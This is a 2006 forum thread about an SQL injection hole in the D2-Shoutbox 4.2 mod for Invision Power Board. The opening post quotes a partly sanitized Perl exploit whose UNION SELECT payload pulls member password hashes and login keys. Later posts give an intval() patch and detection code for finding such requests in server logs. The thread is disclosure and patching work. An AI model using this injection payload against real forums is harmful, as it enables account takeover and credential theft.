D2-Shoutbox 4.2.1
Labonte18
post Mar 7 2006, 05:57 PM
Post #2596


Newbie
*

Group: Members
Posts: 47
Joined: 20-April 03
Member No.: 5,015



Just a note.. There's an SQL injection exploit out for version 4.2 of this mod..

CODE
#!/usr/bin/perl
#########################################################
#       _______ _______ ______       #
#       |______ |______ |     \      #
#       ______| |______ |_____/      #
#                                    #
#D2-Shoutbox 4.2(IPB Mod)<=SQL injection      #
#Created By SkOd                                        #
#SED security Team                                      #
#http://www.sed-team.be                                 #
#skod.uk@gmail.com                                      #
#ISRAEL                                                 #
#########################################################
#google:
#"Powered By D2-Shoutbox 4.2"
#########################################################
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid  = $ARGV[3];
$pid  = $ARGV[4];
$type = $ARGV[5];

sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2\n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
$path = $ARGV[1].$sql;
}


sub header()
{
print q{
#######################################################################
###       D2-Shoutbox 4.2 SQL injection Exploit               ###
###       Tested On D2-Shoutbox 4.2 And IPB 2.4               ###
###        Created By SkOd, Sed Security Team               ###
#######################################################################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
#######################################################################
}
}

sub sedsock()
{
$####k = ##::######::#####->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
print $sedsock "GET $path HTTP/1.1\n";
print $sedsock "Host: $host\n";
print $sedsock "Accept: */*\n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
print $sedsock "Connection: close\n\n";
while($res = <$sedsock>){
$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
}
}

if(@A#RGV < 6){
######();
}else{
type();
sedsock();
}

# milw0rm.com [2006-03-06]


Sanitized the exploit so it is useless, but this WILL allow someone to take over your forum.


CheetahShrk
post Mar 9 2006, 05:50 PM
Post #2597


Hello, I am CheetahShrk, and I am a smileyholic.
******

Group: Members
Posts: 4,474
Joined: 21-November 04
From: Space?
Member No.: 133,540
IPB Version: Not Applicable



Here's my fix for the above exploit :P
open shoutbox.php in /sources/d2mods/shoutbox/
find
CODE

    function render_saved_shouts()
    {
        global $ibforums, $DB, $std, $print;

add under
CODE

$ibforums->input['load'] = intval($ibforums->input['load']);
$ibforums->input['delete'] = intval($ibforums->input['delete']);


This post has been edited by CheetahShrk: Mar 10 2006, 03:36 PM


--------------------
IPB3 is just so <INSERT BAD WORDS USED IN POSITIVE WAYS> awesome.
Mutilated1
post Mar 9 2006, 05:55 PM
Post #2598


Death Walking Terror
******

Group: Members
Posts: 5,505
Joined: 24-February 04
From: Behind You With An Axe!
Member No.: 86,630
IPB Version: 1.2.x



Shouldn't it be as this...

CODE


$ibforums->input['load'] = $std->make_clean($ibforums->input['load']);



???



--------------------
My Favorite Cannibal Corpse Website | Discuss Marketing, Search Engines, Programming, and Good Site Practices
Its easy to get a link to your site from me - ask me how!
QUOTE(Seyeko @ Mar 7 2007, 08:38 AM) [snapback]1791116[/snapback]
Who gives a crap really. its a darn Os and no one uses it but you and a few other people, its kinda like your forum.
CheetahShrk
post Mar 9 2006, 05:58 PM
Post #2599


Hello, I am CheetahShrk, and I am a smileyholic.
******

Group: Members
Posts: 4,474
Joined: 21-November 04
From: Space?
Member No.: 133,540
IPB Version: Not Applicable



No, because load is an integer input, so you only run it through the PHP built-in cleaner, since intval is for returning 0 if the input is not a number; what you posted is for a whole overcomplicated text input and wastes resources. When it comes to cleaning integer (number) only inputs, always use intval; it returns 0 if the input is not a number and returns the same number if a number is inputted.

This post has been edited by CheetahShrk: Mar 9 2006, 06:02 PM


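The difference the posts above are arguing about, as an added example (not code from the thread, from D2-Shoutbox or from IPB): three constructed `load` values are placed into an unquoted numeric position after a text-oriented cleaner and after `intval()`. `build_query()`, `text_clean()`, `strict_int()` and the table name `example_saved_shouts` are hypothetical, and `text_clean()` is a generic stand-in, not IPB's `make_clean`.

```php
<?php
// Added illustration; not code from D2-Shoutbox or IPB.
// build_query() is a hypothetical query builder that puts the 'load'
// request value into an unquoted numeric position.
function build_query($load)
{
    return "SELECT * FROM example_saved_shouts WHERE id=" . $load;
}

// Hypothetical text-oriented cleaner (NOT IPB's make_clean): escapes the
// HTML metacharacters and quotes a free-text filter usually targets.
function text_clean($value)
{
    return htmlspecialchars($value, ENT_QUOTES);
}

// Stricter alternative to intval(): reject instead of silently coercing.
function strict_int($value)
{
    $v = filter_var($value, FILTER_VALIDATE_INT);
    return $v === false ? null : $v;
}

// Constructed inputs: a normal id, an abbreviated form of the payload shape
// quoted in the thread (URL-decoded), and a value with a numeric prefix.
$inputs = array(
    '42',
    '-1 UNION SELECT null,password FROM ibf_members where id=2/*',
    '7 OR 1=1',
);

foreach ($inputs as $raw) {
    // No quotes or HTML characters in the payload, so text_clean() changes nothing.
    echo "text_clean : ", build_query(text_clean($raw)), "\n";
    // intval() keeps only the leading integer: 42, -1 and 7 respectively.
    echo "intval     : ", build_query(intval($raw)), "\n";
    // strict_int() yields 42, NULL and NULL, so malformed input can be refused.
    echo "strict_int : ", var_export(strict_int($raw), true), "\n\n";
}
```

`intval()` keeps a leading numeric prefix (`'7 OR 1=1'` becomes 7), so it removes the injected SQL without signalling that the request was malformed; `strict_int()` returns null for such input so the caller can reject it.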
NickTheGreek
post Mar 9 2006, 06:02 PM
Post #2600


I can be cute, or i can be brute
*****

Group: Members
Posts: 1,097
Joined: 8-June 05
From: Athens, Greece
Member No.: 161,905
IPB Version: 2.0.x



The problem with both fixes, as far as I am concerned, is:

Can we be sure we are set now?

I am sorry to keep asking that, it is just my first day on this world as a hacked board owner.


--------------------
c:\ When the going gets tough, the tough get going ...

The Fairy Tale of YourForum | My Blog
CheetahShrk
post Mar 9 2006, 06:22 PM
Post #2601


Hello, I am CheetahShrk, and I am a smileyholic.
******

Group: Members
Posts: 4,474
Joined: 21-November 04
From: Space?
Member No.: 133,540
IPB Version: Not Applicable



QUOTE(NickTheGreek @ Mar 9 2006, 07:02 PM) [snapback]1652957[/snapback]

The problem with both fixes, as far as I am concerned, is:

Can we be sure we are set now?

I am sorry to keep asking that, it is just my first day on this world as a hacked board owner.

Uh, use my fix only, as it won't do something useless and it's fast :P
Should be set. If I'm nice I might look through other inputs to make sure they are intvaled correctly, though that's really Dean's job.


NickTheGreek
post Mar 9 2006, 06:33 PM
Post #2602


I can be cute, or i can be brute
*****

Group: Members
Posts: 1,097
Joined: 8-June 05
From: Athens, Greece
Member No.: 161,905
IPB Version: 2.0.x



Thanks mate...

If you manage to find some time and check the rest of the code, I would be grateful...

I just revised some of the code and there is no $ibforums->input['load'] = intval($ibforums->input['load']) but in 2-3 cases ... this could mean potential other exploits, I dunno.


CheetahShrk
post Mar 9 2006, 06:37 PM
Post #2603


Hello, I am CheetahShrk, and I am a smileyholic.
******

Group: Members
Posts: 4,474
Joined: 21-November 04
From: Space?
Member No.: 133,540
IPB Version: Not Applicable



You only need it in that one function, as the other functions do not use load, so it will be fine being defined once, not twice or triple; just once at the top will affect all instances of it in the function. It shouldn't matter in switch cases, as it will have to be a number or it will go default.

This post has been edited by CheetahShrk: Mar 9 2006, 06:38 PM


NickTheGreek
post Mar 10 2006, 10:21 AM
Post #2604


I can be cute, or i can be brute
*****

Group: Members
Posts: 1,097
Joined: 8-June 05
From: Athens, Greece
Member No.: 161,905
IPB Version: 2.0.x



The suggested code DID not work

I reply DID NOT WORK...

Same person attacked in front of me demonstrating this (I was absent the first time but now I saw that), he changed my root admin pass...

D2 Shoutbox is still with security leaks


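For a board owner in the situation described above, one way to check web server access logs for requests that hit the shoutbox with a non-integer `load` or `delete` value, as an added example that is not part of the thread. The function names are hypothetical, the log lines are constructed, and the Apache common/combined log format is an assumption.

```php
<?php
// Added illustration, not part of the thread: flag act=Shoutbox requests whose
// 'load' or 'delete' parameter is not a plain non-negative integer.
function suspicious_shoutbox_params($target)
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query)) {
        return array();
    }
    parse_str($query, $params);          // splits and URL-decodes the values
    if (!isset($params['act']) || !is_string($params['act'])
        || strcasecmp($params['act'], 'Shoutbox') !== 0) {
        return array();
    }
    $bad = array();
    foreach (array('load', 'delete') as $name) {
        if (isset($params[$name])
            && !(is_string($params[$name]) && ctype_digit($params[$name]))) {
            $bad[$name] = $params[$name];
        }
    }
    return $bad;
}

function scan_access_log(array $lines)
{
    $hits = array();
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})/';
    foreach ($lines as $line) {
        if (!preg_match($re, $line, $m)) {
            continue;                    // not a recognisable log line
        }
        $bad = suspicious_shoutbox_params($m[3]);
        if ($bad) {
            $hits[] = array('ip' => $m[1], 'time' => $m[2], 'status' => $m[4], 'params' => $bad);
        }
    }
    return $hits;
}

// Constructed sample lines (documentation IP ranges, invented timestamps).
$sample = array(
    '192.0.2.10 - - [09/Mar/2006:18:01:12 +0000] "GET /forum/index.php?act=Shoutbox&view=saved&load=15 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Mar/2006:18:03:40 +0000] "GET /forum/index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null%20FROM%20ibf_members/* HTTP/1.1" 200 4870',
    '192.0.2.10 - - [09/Mar/2006:18:04:02 +0000] "GET /forum/index.php?act=idx HTTP/1.1" 200 20480',
);
foreach (scan_access_log($sample) as $h) {
    echo $h['time'], ' ', $h['ip'], ' status=', $h['status'], ' ', json_encode($h['params'], JSON_UNESCAPED_SLASHES), "\n";
}
```

Only the second sample line is reported; a hit dated before the patch was applied is a reason to treat the member password hashes and login keys as exposed and reset them.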
cooldude7273
post Mar 10 2006, 03:29 PM
Post #2605


Advanced Member
***

Group: Members
Posts: 364
Joined: 9-September 03
From: Roswell, GA, USA
Member No.: 41,519
IPB Version: 2.3.x



This exploit has been formally published now: http://www.securityfocus.com/bid/16984

This post has been edited by cooldude7273: Mar 10 2006, 03:30 PM


--------------------
Get The Biggest Bot List for IPB 2.x
Now at Version 5.0.3!
Let IPB Identify and Log Bots from Hundreds of Sites!
Download The Biggest Bot List NOW!
CheetahShrk
post Mar 10 2006, 03:37 PM
Post #2606


Hello, I am CheetahShrk, and I am a smileyholic.
******

Group: Members
Posts: 4,474
Joined: 21-November 04
From: Space?
Member No.: 133,540
IPB Version: Not Applicable



Ignore NickTheGreek
the patch does work
Here's my fix for the above exploit :P
open shoutbox.php in /sources/d2mods/shoutbox/
find
CODE

    function render_saved_shouts()
    {
        global $ibforums, $DB, $std, $print;

add under
CODE

$ibforums->input['load'] = intval($ibforums->input['load']);
$ibforums->input['delete'] = intval($ibforums->input['delete']);

Patch it asap.


NickTheGreek
post Mar 10 2006, 03:39 PM
Post #2607


I can be cute, or i can be brute
*****

Group: Members
Posts: 1,097
Joined: 8-June 05
From: Athens, Greece
Member No.: 161,905
IPB Version: 2.0.x



Thanks for the support


starbuckje
post Mar 10 2006, 03:59 PM
Post #2608


Member
**

Group: Members
Posts: 116
Joined: 5-May 05
Member No.: 156,910
IPB Version: 2.1.x



I thank Dean for all of his mods! I used lots of them. The ideas behind them are great! But I sometimes get the feeling he is 98% ready and wants to play with a new mod so he leaves the last 2% for php-newbies to figure out.

Now I read on the pages of D-Scripting that we should not bother Dean with this problem because this mod is for 2.0.x and he does not give support on 'older' versions of mods...

Excuse me, but when did Invision 2.0.x become old?? I applied tons of hours in modifying my 2.0.4 boards and now Dean wants me to start all over with the 2.1.x board? Come on! Spend a few hours and finalize this mod!!

But as with the questions for the scrollbars in Firefox I imagine this cry for help is wasted too....

I love your coding Dean, but if this is really how you look at your 'customers' problems, I will never install one of your mods again! I can't have this!

Because when you do the mods for 2.1.x only for 98% what is the point of upgrading?

Don't get me wrong! My members love your shoutbox, so I will make backups every day hoping the hackers can't find me, but somehow I think the day will come.

You are a wizard at coding mods! The speed in which you come up with them is awesome! But you just have to finish them! Look at the D-Portal! Please don't let anyone tell me it is finished! Bfarber may have put less functions in his portal, but it IS finished!

And take the people who install your mods seriously as they depend on that! Better wait until coding for 2.1.x until 2.0.x is ready, or people won't be installing your mods anymore!!

I hope no one feels I am breaking Dean down, for that is not my intention. I just think that lots of people feel the same way!

I patched it as you mentioned Nick! I hope it is sufficient!

Thanks for the support that others don't bother with...


--------------------
Dreamhost-sucks.com

Beware!! Don't fall for it!!
CheetahShrk
post Mar 10 2006, 04:07 PM
Post #2609


Hello, I am CheetahShrk, and I am a smileyholic.
******

Group: Members
Posts: 4,474
Joined: 21-November 04
From: Space?
Member No.: 133,540
IPB Version: Not Applicable



QUOTE(starbuckje @ Mar 10 2006, 04:59 PM) [snapback]1653426[/snapback]

I patched it as you mentioned Nick! I hope it is sufficient!

Don't remember seeing Nick making the patch lol


starbuckje
post Mar 10 2006, 04:09 PM
Post #2610


Member
**

Group: Members
Posts: 116
Joined: 5-May 05
Member No.: 156,910
IPB Version: 2.1.x



Ahum, I meant Cheetah!! Sorry!!! Won't happen again!!!!

Thank G*d you say 'lol' :P

